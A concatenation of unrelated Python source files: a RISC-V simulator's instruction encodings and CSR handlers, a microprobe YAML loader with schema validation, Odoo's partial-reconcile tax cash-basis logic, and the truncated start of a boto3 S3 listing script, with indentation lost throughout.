['mrth', '00110000011000000000000001110011'],
['mrts', '00110000010100000000000001110011'],
['hrts', '00100000010100000000000001110011'],
['csrrw', 'xxxxxxxxxxxxxxxxx001xxxxx1110011'],
['csrrs', 'xxxxxxxxxxxxxxxxx010xxxxx1110011'],
['csrrc', 'xxxxxxxxxxxxxxxxx011xxxxx1110011'],
['csrrwi', 'xxxxxxxxxxxxxxxxx101xxxxx1110011'],
['csrrsi', 'xxxxxxxxxxxxxxxxx110xxxxx1110011'],
['csrrci', 'xxxxxxxxxxxxxxxxx111xxxxx1110011'],
['custom0', 'xxxxxxxxxxxxxxxxx000xxxxx0001011'],
['custom0_rs1', 'xxxxxxxxxxxxxxxxx010xxxxx0001011'],
['custom0_rs1_rs2', 'xxxxxxxxxxxxxxxxx011xxxxx0001011'],
['custom0_rd', 'xxxxxxxxxxxxxxxxx100xxxxx0001011'],
['custom0_rd_rs1', 'xxxxxxxxxxxxxxxxx110xxxxx0001011'],
['custom0_rd_rs1_rs2', 'xxxxxxxxxxxxxxxxx111xxxxx0001011'],
['custom1', 'xxxxxxxxxxxxxxxxx000xxxxx0101011'],
['custom1_rs1', 'xxxxxxxxxxxxxxxxx010xxxxx0101011'],
['custom1_rs1_rs2', 'xxxxxxxxxxxxxxxxx011xxxxx0101011'],
['custom1_rd', 'xxxxxxxxxxxxxxxxx100xxxxx0101011'],
['custom1_rd_rs1', 'xxxxxxxxxxxxxxxxx110xxxxx0101011'],
['custom1_rd_rs1_rs2', 'xxxxxxxxxxxxxxxxx111xxxxx0101011'],
['custom2', 'xxxxxxxxxxxxxxxxx000xxxxx1011011'],
['custom2_rs1', 'xxxxxxxxxxxxxxxxx010xxxxx1011011'],
['custom2_rs1_rs2', 'xxxxxxxxxxxxxxxxx011xxxxx1011011'],
['custom2_rd', 'xxxxxxxxxxxxxxxxx100xxxxx1011011'],
['custom2_rd_rs1', 'xxxxxxxxxxxxxxxxx110xxxxx1011011'],
['custom2_rd_rs1_rs2', 'xxxxxxxxxxxxxxxxx111xxxxx1011011'],
['custom3', 'xxxxxxxxxxxxxxxxx000xxxxx1111011'],
['custom3_rs1', 'xxxxxxxxxxxxxxxxx010xxxxx1111011'],
['custom3_rs1_rs2', 'xxxxxxxxxxxxxxxxx011xxxxx1111011'],
['custom3_rd', 'xxxxxxxxxxxxxxxxx100xxxxx1111011'],
['custom3_rd_rs1', 'xxxxxxxxxxxxxxxxx110xxxxx1111011'],
['custom3_rd_rs1_rs2', 'xxxxxxxxxxxxxxxxx111xxxxx1111011'],
# HACK: mapping fsd and fld ops to nop for translatable subset
['nop', 'xxxxxxxxxxxxxxxxx011xxxxx0000111'],
['nop', 'xxxxxxxxxxxxxxxxx011xxxxx0100111'],
]
base_enc = ( isa_RV32I.encodings + isa_RV64I.encodings )
extn_enc = ( isa_RV32M.encodings + isa_RV64M.encodings
+ isa_RV32A.encodings + isa_RV64A.encodings )
if ENABLE_FP:
fp_enc = ( isa_RV32F.encodings + isa_RV64F.encodings
+ isa_RV32D.encodings + isa_RV64D.encodings )
else:
fp_enc = []
encodings = base_enc + extn_enc + fp_enc + other_encodings
#=======================================================================
# Instruction Definitions
#=======================================================================
def execute_nop( s, inst ):
s.pc += 4
def execute_sret( s, inst ):
if s.prv == PRV_M:
s.pc = s.mepc
elif s.prv == PRV_S:
s.pc = s.sepc
else:
raise FatalError( "sret encountered on privilege level %d" % s.prv )
def execute_sfence_vm( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_wfi( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_mrth( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_mrts( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_hrts( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_csrrw( s, inst ):
old_val = s.csr.get_csr( inst.csr )
new_val = s.rf[inst.rs1]
s.csr.set_csr( inst.csr, new_val )
s.rf[inst.rd] = old_val
s.pc += 4
def execute_csrrs( s, inst ):
old_val = s.csr.get_csr( inst.csr )
new_val = old_val | s.rf[inst.rs1]
s.csr.set_csr( inst.csr, new_val )
s.rf[inst.rd] = old_val
s.pc += 4
def execute_csrrc( s, inst ):
old_val = s.csr.get_csr( inst.csr )
new_val = old_val & ~s.rf[inst.rs1]
s.csr.set_csr( inst.csr, new_val )
s.rf[inst.rd] = old_val
s.pc += 4
def execute_csrrwi( s, inst ):
old_val = s.csr.get_csr( inst.csr )
new_val = inst.zimm
s.csr.set_csr( inst.csr, new_val )
s.rf[inst.rd] = old_val
s.pc += 4
def execute_csrrsi( s, inst ):
old_val = s.csr.get_csr( inst.csr )
new_val = old_val | inst.zimm
s.csr.set_csr( inst.csr, new_val )
s.rf[inst.rd] = old_val
s.pc += 4
def execute_csrrci( s, inst ):
old_val = s.csr.get_csr( inst.csr )
new_val = old_val & ~inst.zimm
s.csr.set_csr( inst.csr, new_val )
s.rf[inst.rd] = old_val
s.pc += 4
def execute_custom0( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom0_rs1( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom0_rs1_rs2( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom0_rd( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom0_rd_rs1( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom0_rd_rs1_rs2( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom1( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom1_rs1( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom1_rs1_rs2( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom1_rd( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom1_rd_rs1( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom1_rd_rs1_rs2( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom2( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom2_rs1( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom2_rs1_rs2( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom2_rd( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom2_rd_rs1( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom2_rd_rs1_rs2( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom3( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom3_rs1( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom3_rs1_rs2( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom3_rd( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom3_rd_rs1( s, inst ):
raise NotImplementedInstError()
s.pc += 4
def execute_custom3_rd_rs1_rs2( s, inst ):
raise NotImplementedInstError()
s.pc += 4
#=======================================================================
# Create Decoder
#=======================================================================
decode = create_risc_decoder( encodings, globals(), debug=True )
|
<gh_stars>1-10
# Copyright 2018 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""":mod:`microprobe.utils.yaml` module
"""
# Futures
from __future__ import absolute_import
# Built-in modules
import os
# Third party modules
import yaml
from rxjson.Rx import Error, Factory # @UnresolvedImport
# Own modules
from microprobe.exceptions import MicroprobeCacheError, \
MicroprobeYamlFormatError
from microprobe.utils.cache import read_default_cache_data, \
update_cache_needed, write_default_cache_data
from microprobe.utils.logger import get_logger
# Constants
LOG = get_logger(__name__)
__all__ = ["read_yaml"]
# Functions
def _read_yaml(filename):
"""Reads a YAML file
:param filename:
"""
result = update_cache_needed([filename])
if not result:
try:
return read_default_cache_data(filename)
except MicroprobeCacheError:
LOG.debug("Unable to read cache data for '%s'", filename)
if not os.path.isfile(filename):
raise MicroprobeYamlFormatError(
"File '%s' referenced in YAML definition not found" % filename
)
with open(filename, 'r') as yaml_fd:
raw_data = yaml_fd.read()
try:
data = yaml.safe_load(raw_data)
except yaml.composer.ComposerError as exc:
raise MicroprobeYamlFormatError(
"YAML parsing error while processing "
"file '%s'. Error reported: '%s'" % (filename, str(exc))
)
except yaml.scanner.ScannerError as exc:
raise MicroprobeYamlFormatError(
"YAML parsing error while processing "
"file '%s'. Error reported: '%s'" % (filename, str(exc))
)
except yaml.parser.ParserError as exc:
raise MicroprobeYamlFormatError(
"YAML parsing error while processing "
"file '%s'. Error reported: '%s'" % (filename, str(exc))
)
except yaml.scanner.ScannerError as exc:
raise MicroprobeYamlFormatError(
"YAML parsing error while processing "
"file '%s'. Error reported: '%s'" % (filename, str(exc))
)
try:
write_default_cache_data(filename, data)
except MicroprobeCacheError:
LOG.debug("Unable to update cache data for '%s'", filename)
return data
def _create_yaml_schema(filename):
"""Creates a YAML schema
:param filename:
"""
yaml_schema = _read_yaml(filename)
rx_obj = Factory({"register_core_types": True})
try:
schema = rx_obj.make_schema(yaml_schema)
except Error as error:
raise MicroprobeYamlFormatError(
"Invalid schema definition in '%s'.\n"
"Error message:%s" % (filename, error)
)
return schema
def read_yaml(data_file, schema_file):
"""Reads a file and checks it against the schema file. Returns
the data
:param data_file:
:param schema_file:
"""
LOG.debug("Start")
LOG.debug("Data file: %s", data_file)
LOG.debug("Schema file: %s", schema_file)
result = update_cache_needed([data_file])
result = result or update_cache_needed([schema_file])
readed = False
if not result:
LOG.debug("Using cache contents for '%s'", data_file)
try:
data = read_default_cache_data(data_file)
readed = True
except MicroprobeCacheError:
LOG.debug("Unable to read cache data for '%s'", data_file)
readed = False
if not readed:
data = _read_yaml(data_file)
if data is None:
LOG.warning("No data found in file: %s", data_file)
LOG.debug("End")
return data
schema = _create_yaml_schema(schema_file)
if not schema.check(data):
LOG.info("Schema not validated")
if isinstance(data, list):
LOG.info("Check each element to provide a nice hint to the error")
for cdata in data:
if not schema.check([cdata]):
LOG.info("Element failing:")
for line in yaml.dump(
cdata, default_flow_style=False
).split('\n'):
LOG.info(line)
raise MicroprobeYamlFormatError(
"YAML definition file in"
"'%s' does not follow the "
"schema definition in '%s'" % (data_file, schema_file)
)
else:
raise MicroprobeYamlFormatError(
"YAML definition file in"
"'%s' does not follow the "
"schema definition in '%s'" % (data_file, schema_file)
)
LOG.debug("End")
return data
# Classes
|
# -*- coding: utf-8 -*-
from odoo import api, fields, models, _
from odoo.exceptions import UserError, ValidationError
from datetime import date
class AccountPartialReconcile(models.Model):
_name = "account.partial.reconcile"
_description = "Partial Reconcile"
_rec_name = "id"
# ==== Reconciliation fields ====
debit_move_id = fields.Many2one(
comodel_name='account.move.line',
index=True, required=True)
credit_move_id = fields.Many2one(
comodel_name='account.move.line',
index=True, required=True)
full_reconcile_id = fields.Many2one(
comodel_name='account.full.reconcile',
string="Full Reconcile", copy=False)
# ==== Currency fields ====
company_currency_id = fields.Many2one(
comodel_name='res.currency',
string="Company Currency",
related='company_id.currency_id',
help="Utility field to express amount currency")
debit_currency_id = fields.Many2one(
comodel_name='res.currency',
store=True,
compute='_compute_debit_currency_id',
string="Currency of the debit journal item.")
credit_currency_id = fields.Many2one(
comodel_name='res.currency',
store=True,
compute='_compute_credit_currency_id',
string="Currency of the credit journal item.")
# ==== Amount fields ====
amount = fields.Monetary(
currency_field='company_currency_id',
help="Always positive amount concerned by this matching expressed in the company currency.")
debit_amount_currency = fields.Monetary(
currency_field='debit_currency_id',
help="Always positive amount concerned by this matching expressed in the debit line foreign currency.")
credit_amount_currency = fields.Monetary(
currency_field='credit_currency_id',
help="Always positive amount concerned by this matching expressed in the credit line foreign currency.")
# ==== Other fields ====
company_id = fields.Many2one(
comodel_name='res.company',
string="Company", store=True, readonly=False,
related='debit_move_id.company_id')
max_date = fields.Date(
string="Max Date of Matched Lines", store=True,
compute='_compute_max_date',
help="Technical field used to determine at which date this reconciliation needs to be shown on the "
"aged receivable/payable reports.")
# -------------------------------------------------------------------------
# CONSTRAINT METHODS
# -------------------------------------------------------------------------
@api.constrains('debit_currency_id', 'credit_currency_id')
def _check_required_computed_currencies(self):
bad_partials = self.filtered(lambda partial: not partial.debit_currency_id or not partial.credit_currency_id)
if bad_partials:
raise ValidationError(_("Missing foreign currencies on partials having ids: %s", bad_partials.ids))
# -------------------------------------------------------------------------
# COMPUTE METHODS
# -------------------------------------------------------------------------
@api.depends('debit_move_id.date', 'credit_move_id.date')
def _compute_max_date(self):
for partial in self:
partial.max_date = max(
partial.debit_move_id.date,
partial.credit_move_id.date
)
@api.depends('debit_move_id')
def _compute_debit_currency_id(self):
for partial in self:
partial.debit_currency_id = partial.debit_move_id.currency_id \
or partial.debit_move_id.company_currency_id
@api.depends('credit_move_id')
def _compute_credit_currency_id(self):
for partial in self:
partial.credit_currency_id = partial.credit_move_id.currency_id \
or partial.credit_move_id.company_currency_id
# -------------------------------------------------------------------------
# LOW-LEVEL METHODS
# -------------------------------------------------------------------------
def unlink(self):
# OVERRIDE to unlink full reconcile linked to the current partials
# and reverse the tax cash basis journal entries.
# Avoid cyclic unlink calls when removing the partials that could remove some full reconcile
# and then, loop again and again.
if not self:
return True
# Retrieve the matching number to unlink.
full_to_unlink = self.full_reconcile_id
# Retrieve the CABA entries to reverse.
moves_to_reverse = self.env['account.move'].search([('tax_cash_basis_rec_id', 'in', self.ids)])
# Unlink partials before doing anything else to avoid 'Record has already been deleted' due to the recursion.
res = super().unlink()
# Reverse CABA entries.
today = fields.Date.context_today(self)
default_values_list = [{
'date': move.date if move.date > (move.company_id.period_lock_date or date.min) else today,
'ref': _('Reversal of: %s') % move.name,
} for move in moves_to_reverse]
moves_to_reverse._reverse_moves(default_values_list, cancel=True)
# Remove the matching numbers.
full_to_unlink.unlink()
return res
# -------------------------------------------------------------------------
# RECONCILIATION METHODS
# -------------------------------------------------------------------------
def _collect_tax_cash_basis_values(self):
''' Collect all information needed to create the tax cash basis journal entries on the current partials.
:return: A dictionary mapping each move_id to the result of 'account_move._collect_tax_cash_basis_values'.
Also, add the 'partials' keys being a list of dictionary, one for each partial to process:
* partial: The account.partial.reconcile record.
* percentage: The reconciled percentage represented by the partial.
* payment_rate: The applied rate of this partial.
'''
tax_cash_basis_values_per_move = {}
if not self:
return {}
for partial in self:
for move in {partial.debit_move_id.move_id, partial.credit_move_id.move_id}:
# Collect data about cash basis.
if move.id not in tax_cash_basis_values_per_move:
tax_cash_basis_values_per_move[move.id] = move._collect_tax_cash_basis_values()
# Nothing to process on the move.
if not tax_cash_basis_values_per_move.get(move.id):
continue
move_values = tax_cash_basis_values_per_move[move.id]
# Check the cash basis configuration only when at least one cash basis tax entry need to be created.
journal = partial.company_id.tax_cash_basis_journal_id
if not journal:
raise UserError(_("There is no tax cash basis journal defined for the '%s' company.\n"
"Configure it in Accounting/Configuration/Settings") % partial.company_id.display_name)
partial_amount = 0.0
partial_amount_currency = 0.0
rate_amount = 0.0
rate_amount_currency = 0.0
if partial.debit_move_id.move_id == move:
partial_amount += partial.amount
partial_amount_currency += partial.debit_amount_currency
rate_amount -= partial.credit_move_id.balance
rate_amount_currency -= partial.credit_move_id.amount_currency
source_line = partial.debit_move_id
counterpart_line = partial.credit_move_id
if partial.credit_move_id.move_id == move:
partial_amount += partial.amount
partial_amount_currency += partial.credit_amount_currency
rate_amount += partial.debit_move_id.balance
rate_amount_currency += partial.debit_move_id.amount_currency
source_line = partial.credit_move_id
counterpart_line = partial.debit_move_id
if move_values['currency'] == move.company_id.currency_id:
# Percentage made on company's currency.
percentage = partial_amount / move_values['total_balance']
else:
# Percentage made on foreign currency.
percentage = partial_amount_currency / move_values['total_amount_currency']
if source_line.currency_id != counterpart_line.currency_id:
# When the invoice and the payment are not sharing the same foreign currency, the rate is computed
# on-the-fly using the payment date.
payment_rate = self.env['res.currency']._get_conversion_rate(
counterpart_line.company_currency_id,
source_line.currency_id,
counterpart_line.company_id,
counterpart_line.date,
)
elif rate_amount:
payment_rate = rate_amount_currency / rate_amount
else:
payment_rate = 0.0
partial_vals = {
'partial': partial,
'percentage': percentage,
'payment_rate': payment_rate,
}
# Add partials.
move_values.setdefault('partials', [])
move_values['partials'].append(partial_vals)
# Clean-up moves having nothing to process.
return {k: v for k, v in tax_cash_basis_values_per_move.items() if v}
@api.model
def _prepare_cash_basis_base_line_vals(self, base_line, balance, amount_currency):
''' Prepare the values to be used to create the cash basis journal items for the tax base line
passed as parameter.
:param base_line: An account.move.line being the base of some taxes.
:param balance: The balance to consider for this line.
:param amount_currency: The balance in foreign currency to consider for this line.
:return: A python dictionary that could be passed to the create method of
account.move.line.
'''
account = base_line.company_id.account_cash_basis_base_account_id or base_line.account_id
return {
'name': base_line.move_id.name,
'debit': balance if balance > 0.0 else 0.0,
'credit': -balance if balance < 0.0 else 0.0,
'amount_currency': amount_currency,
'currency_id': base_line.currency_id.id,
'partner_id': base_line.partner_id.id,
'account_id': account.id,
'tax_ids': [(6, 0, base_line.tax_ids.ids)],
'tax_tag_ids': [(6, 0, base_line._convert_tags_for_cash_basis(base_line.tax_tag_ids).ids)],
'tax_exigible': True,
}
@api.model
def _prepare_cash_basis_counterpart_base_line_vals(self, cb_base_line_vals):
''' Prepare the move line used as a counterpart of the line created by
_prepare_cash_basis_base_line_vals.
:param cb_base_line_vals: The line returned by _prepare_cash_basis_base_line_vals.
:return: A python dictionary that could be passed to the create method of
account.move.line.
'''
return {
'name': cb_base_line_vals['name'],
'debit': cb_base_line_vals['credit'],
'credit': cb_base_line_vals['debit'],
'account_id': cb_base_line_vals['account_id'],
'amount_currency': -cb_base_line_vals['amount_currency'],
'currency_id': cb_base_line_vals['currency_id'],
'partner_id': cb_base_line_vals['partner_id'],
'tax_exigible': True,
}
@api.model
def _prepare_cash_basis_tax_line_vals(self, tax_line, balance, amount_currency):
''' Prepare the move line corresponding to a tax in the cash basis entry.
:param tax_line: An account.move.line record being a tax line.
:param balance: The balance to consider for this line.
:param amount_currency: The balance in foreign currency to consider for this line.
:return: A python dictionary that could be passed to the create method of
account.move.line.
'''
return {
'name': tax_line.name,
'debit': balance if balance > 0.0 else 0.0,
'credit': -balance if balance < 0.0 else 0.0,
'tax_base_amount': tax_line.tax_base_amount,
'tax_repartition_line_id': tax_line.tax_repartition_line_id.id,
'tax_ids': [(6, 0, tax_line.tax_ids.ids)],
'tax_tag_ids': [(6, 0, tax_line._convert_tags_for_cash_basis(tax_line.tax_tag_ids).ids)],
'account_id': tax_line.tax_repartition_line_id.account_id.id or tax_line.account_id.id,
'amount_currency': amount_currency,
'currency_id': tax_line.currency_id.id,
'partner_id': tax_line.partner_id.id,
'tax_exigible': True,
}
@api.model
def _prepare_cash_basis_counterpart_tax_line_vals(self, tax_line, cb_tax_line_vals):
''' Prepare the move line used as a counterpart of the line created by
_prepare_cash_basis_tax_line_vals.
:param tax_line: An account.move.line record being a tax line.
:param cb_tax_line_vals: The result of _prepare_cash_basis_counterpart_tax_line_vals.
:return: A python dictionary that could be passed to the create method of
account.move.line.
'''
return {
'name': cb_tax_line_vals['name'],
'debit': cb_tax_line_vals['credit'],
'credit': cb_tax_line_vals['debit'],
'account_id': tax_line.account_id.id,
'amount_currency': -cb_tax_line_vals['amount_currency'],
'currency_id': cb_tax_line_vals['currency_id'],
'partner_id': cb_tax_line_vals['partner_id'],
'tax_exigible': True,
}
@api.model
def _get_cash_basis_base_line_grouping_key_from_vals(self, base_line_vals):
''' Get the grouping key of a cash basis base line that hasn't yet been created.
:param base_line_vals: The values to create a new account.move.line record.
:return: The grouping key as a tuple.
'''
return (
base_line_vals['currency_id'],
base_line_vals['partner_id'],
base_line_vals['account_id'],
tuple(base_line_vals['tax_ids'][0][2]), # Decode [(6, 0, [...])] command
tuple(base_line_vals['tax_tag_ids'][0][2]), # Decode [(6, 0, [...])] command
)
@api.model
def _get_cash_basis_base_line_grouping_key_from_record(self, base_line, account=None):
''' Get the grouping key of a journal item being a base line.
:param base_line: An account.move.line record.
:param account: Optional account to shadow the current base_line one.
:return: The grouping key as a tuple.
'''
return (
base_line.currency_id.id,
base_line.partner_id.id,
(account or base_line.account_id).id,
tuple(base_line.tax_ids.ids),
tuple(base_line._convert_tags_for_cash_basis(base_line.tax_tag_ids).ids),
)
@api.model
def _get_cash_basis_tax_line_grouping_key_from_vals(self, tax_line_vals):
''' Get the grouping key of a cash basis tax line that hasn't yet been created.
:param tax_line_vals: The values to create a new account.move.line record.
:return: The grouping key as a tuple.
'''
return (
tax_line_vals['currency_id'],
tax_line_vals['partner_id'],
tax_line_vals['account_id'],
tuple(tax_line_vals['tax_ids'][0][2]), # Decode [(6, 0, [...])] command
tuple(tax_line_vals['tax_tag_ids'][0][2]), # Decode [(6, 0, [...])] command
tax_line_vals['tax_repartition_line_id'],
)
@api.model
def _get_cash_basis_tax_line_grouping_key_from_record(self, tax_line, account=None):
''' Get the grouping key of a journal item being a tax line.
:param tax_line: An account.move.line record.
:param account: Optional account to shadow the current tax_line one.
:return: The grouping key as a tuple.
'''
return (
tax_line.currency_id.id,
tax_line.partner_id.id,
(account or tax_line.account_id).id,
tuple(tax_line.tax_ids.ids),
tuple(tax_line._convert_tags_for_cash_basis(tax_line.tax_tag_ids).ids),
tax_line.tax_repartition_line_id.id,
)
@api.model
def _fix_cash_basis_full_balance_coverage(self, move_values, partial_values, pending_cash_basis_lines, partial_lines_to_create):
''' This method is used to ensure the full coverage of the current move when it becomes fully paid.
For example, suppose a line of 0.03 paid 50-50. Without this method, each cash basis entry will report
0.03 / 0.5 = 0.015 ~ 0.02 per cash entry on the tax report as base amount, for a total of 0.04.
This is wrong because we expect 0.03.on the tax report as base amount. This is wrong because we expect 0.03.
:param move_values: The collected values about cash basis for the current move.
:param partial_values: The collected values about cash basis for the current partial.
:param pending_cash_basis_lines: The previously generated lines during this reconciliation but not yet created.
:param partial_lines_to_create: The generated lines for the current and last partial making the move fully paid.
'''
# DEPRECATED: TO BE REMOVED IN MASTER
residual_amount_per_group = {}
move = move_values['move']
# ==========================================================================
# Part 1:
# Add the balance of all journal items that are not tax exigible in order to
# ensure the exact balance will be report on the Tax Report.
# This part is needed when the move will be fully paid after the current
# reconciliation.
# ==========================================================================
for line in move_values['to_process_lines']:
if line.tax_repartition_line_id:
# Tax line.
grouping_key = self._get_cash_basis_tax_line_grouping_key_from_record(
line,
account=line.tax_repartition_line_id.account_id,
)
residual_amount_per_group.setdefault(grouping_key, 0.0)
residual_amount_per_group[grouping_key] += line['amount_currency']
elif line.tax_ids:
# Base line.
grouping_key = self._get_cash_basis_base_line_grouping_key_from_record(
line,
account=line.company_id.account_cash_basis_base_account_id,
)
residual_amount_per_group.setdefault(grouping_key, 0.0)
residual_amount_per_group[grouping_key] += line['amount_currency']
# ==========================================================================
# Part 2:
# Subtract all previously created cash basis journal items during previous
# reconciliation.
# ==========================================================================
previous_tax_cash_basis_moves = self.env['account.move'].search([
'|',
('tax_cash_basis_rec_id', 'in', self.ids),
('tax_cash_basis_move_id', '=', move.id),
])
for line in previous_tax_cash_basis_moves.line_ids:
if line.tax_repartition_line_id:
# Tax line.
grouping_key = self._get_cash_basis_tax_line_grouping_key_from_record(line)
elif line.tax_ids:
# Base line.
grouping_key = self._get_cash_basis_base_line_grouping_key_from_record(line)
else:
continue
if grouping_key not in residual_amount_per_group:
# The grouping_key is unknown regarding the current lines.
# Maybe this move has been created before migration and then,
# we are not able to ensure the full coverage of the balance.
return
residual_amount_per_group[grouping_key] -= line['amount_currency']
# ==========================================================================
# Part 3:
# Subtract all pending cash basis journal items that will be created during
# this reconciliation.
# ==========================================================================
for grouping_key, balance in pending_cash_basis_lines:
residual_amount_per_group[grouping_key] -= balance
# ==========================================================================
# Part 4:
# Fix the current cash basis journal items in progress by replacing the
# balance by the residual one.
# ==========================================================================
for grouping_key, aggregated_vals in partial_lines_to_create.items():
line_vals = aggregated_vals['vals']
amount_currency = residual_amount_per_group[grouping_key]
balance = partial_values['payment_rate'] and amount_currency / partial_values['payment_rate'] or 0.0
line_vals.update({
'debit': balance if balance > 0.0 else 0.0,
'credit': -balance if balance < 0.0 else 0.0,
'amount_currency': amount_currency,
})
def _create_tax_cash_basis_moves(self):
''' Create the tax cash basis journal entries.
:return: The newly created journal entries.
'''
tax_cash_basis_values_per_move = self._collect_tax_cash_basis_values()
moves_to_create = []
to_reconcile_after = []
for move_values in tax_cash_basis_values_per_move.values():
move = move_values['move']
pending_cash_basis_lines = []
for partial_values in move_values['partials']:
partial = partial_values['partial']
# Init the journal entry.
move_vals = {
'move_type': 'entry',
'date': partial.max_date,
'ref': move.name,
'journal_id': partial.company_id.tax_cash_basis_journal_id.id,
'line_ids': [],
'tax_cash_basis_rec_id': partial.id,
'tax_cash_basis_move_id': move.id,
}
# Tracking of lines grouped all together.
# Used to reduce the number of generated lines and to avoid rounding issues.
partial_lines_to_create = {}
for line in move_values['to_process_lines']:
# ==========================================================================
# Compute the balance of the current line on the cash basis entry.
# This balance is a percentage representing the part of the journal entry
# that is actually paid by the current partial.
# ==========================================================================
# Percentage expressed in the foreign currency.
amount_currency = line.currency_id.round(line.amount_currency * partial_values['percentage'])
balance = partial_values['payment_rate'] and amount_currency / partial_values['payment_rate'] or 0.0
# ==========================================================================
# Prepare the mirror cash basis journal item of the current line.
# Group them all together as much as possible to reduce the number of
# generated journal items.
# Also track the computed balance in order to avoid rounding issues when
# the journal entry will be fully paid. At that case, we expect the exact
# amount of each line has been covered by the cash basis journal entries
# and well reported in the Tax Report.
# ==========================================================================
if line.tax_repartition_line_id:
# Tax line.
cb_line_vals = self._prepare_cash_basis_tax_line_vals(line, balance, amount_currency)
grouping_key = self._get_cash_basis_tax_line_grouping_key_from_vals(cb_line_vals)
elif line.tax_ids:
# Base line.
cb_line_vals = self._prepare_cash_basis_base_line_vals(line, balance, amount_currency)
grouping_key = self._get_cash_basis_base_line_grouping_key_from_vals(cb_line_vals)
if grouping_key in partial_lines_to_create:
aggregated_vals = partial_lines_to_create[grouping_key]['vals']
aggregated_vals.update({
'debit': aggregated_vals['debit'] + cb_line_vals['debit'],
'credit': aggregated_vals['credit'] + cb_line_vals['credit'],
'amount_currency': aggregated_vals['amount_currency'] + cb_line_vals['amount_currency'],
})
if line.tax_repartition_line_id:
aggregated_vals.update({
'tax_base_amount': aggregated_vals['tax_base_amount'] + cb_line_vals['tax_base_amount'],
})
partial_lines_to_create[grouping_key]['tax_line'] += line
else:
partial_lines_to_create[grouping_key] = {
'vals': cb_line_vals,
}
if line.tax_repartition_line_id:
partial_lines_to_create[grouping_key].update({
'tax_line': line,
})
# ==========================================================================
# Create the counterpart journal items.
# ==========================================================================
# To be able to retrieve the correct matching between the tax lines to reconcile
# later, the lines will be created using a specific sequence.
sequence = 0
for grouping_key, aggregated_vals in partial_lines_to_create.items():
line_vals = aggregated_vals['vals']
line_vals['sequence'] = sequence
pending_cash_basis_lines.append((grouping_key, line_vals['amount_currency']))
if 'tax_repartition_line_id' in line_vals:
# Tax line.
tax_line = aggregated_vals['tax_line']
counterpart_line_vals = self._prepare_cash_basis_counterpart_tax_line_vals(tax_line, line_vals)
counterpart_line_vals['sequence'] = sequence + 1
if tax_line.account_id.reconcile:
move_index = len(moves_to_create)
to_reconcile_after.append((tax_line, move_index, counterpart_line_vals['sequence']))
else:
# Base line.
counterpart_line_vals = self._prepare_cash_basis_counterpart_base_line_vals(line_vals)
counterpart_line_vals['sequence'] = sequence + 1
sequence += 2
move_vals['line_ids'] += [(0, 0, counterpart_line_vals), (0, 0, line_vals)]
moves_to_create.append(move_vals)
moves = self.env['account.move'].create(moves_to_create)
moves._post(soft=False)
# Reconcile the tax lines being on a reconcile tax basis transfer account.
for line, move_index, sequence in to_reconcile_after:
counterpart_line = moves[move_index].line_ids.filtered(lambda line: line.sequence == sequence)
# When dealing with tiny amounts, the line could have a zero amount and then, be already reconciled.
if counterpart_line.reconciled:
continue
(line + counterpart_line).reconcile()
return moves
|
import os
import time
import json
import boto3
from botocore.client import Config
import botocore
from config import config
from db import db
db = db.Database()
env = config.GetEnvObj()
PBOX_AWS_KEY = env("PBOX_AWS_KEY") if env("PBOX_AWS_KEY") else os.getenv("PBOX_AWS_KEY", None)
PBOX_AWS_SECRET = env("PBOX_AWS_SECRET") if env("PBOX_AWS_SECRET") else os.getenv("PBOX_AWS_SECRET", None)
PBOX_BUCKET = env("PBOX_BUCKET") if env("PBOX_BUCKET") else os.getenv("PBOX_BUCKET", None)
PBOX_REGION = env("PBOX_REGION") if env("PBOX_REGION") else os.getenv("PBOX_REGION", None)
PBOX_S3_URL = env("PBOX_S3_URL") if env("PBOX_S3_URL") else os.getenv("PBOX_S3_URL", None)
# Initialize a session using DigitalOcean Spaces.
session = boto3.Session(aws_access_key_id=PBOX_AWS_KEY, aws_secret_access_key=PBOX_AWS_SECRET)
client = session.client('s3',
region_name=PBOX_REGION,
endpoint_url=PBOX_S3_URL,
aws_access_key_id=PBOX_AWS_KEY,
aws_secret_access_key=PBOX_AWS_SECRET)
s3_obj = session.resource('s3')
s3_bucket = s3_obj.Bucket(PBOX_BUCKET)
def list_all_s3_data(username):
my_bucket = s3_obj.Bucket(PBOX_BUCKET)# + "/" + username + "/")
for my_bucket_object in my_bucket.objects.all():
print(my_bucket_object)
def get_all_versions(bucket, filename):
# s3 = boto3.client('s3')
keys = ["Versions", "DeleteMarkers"]
results = to_delete = []
for k in keys:
try:
response = client.list_object_versions(Bucket=bucket)[k]
print(response)
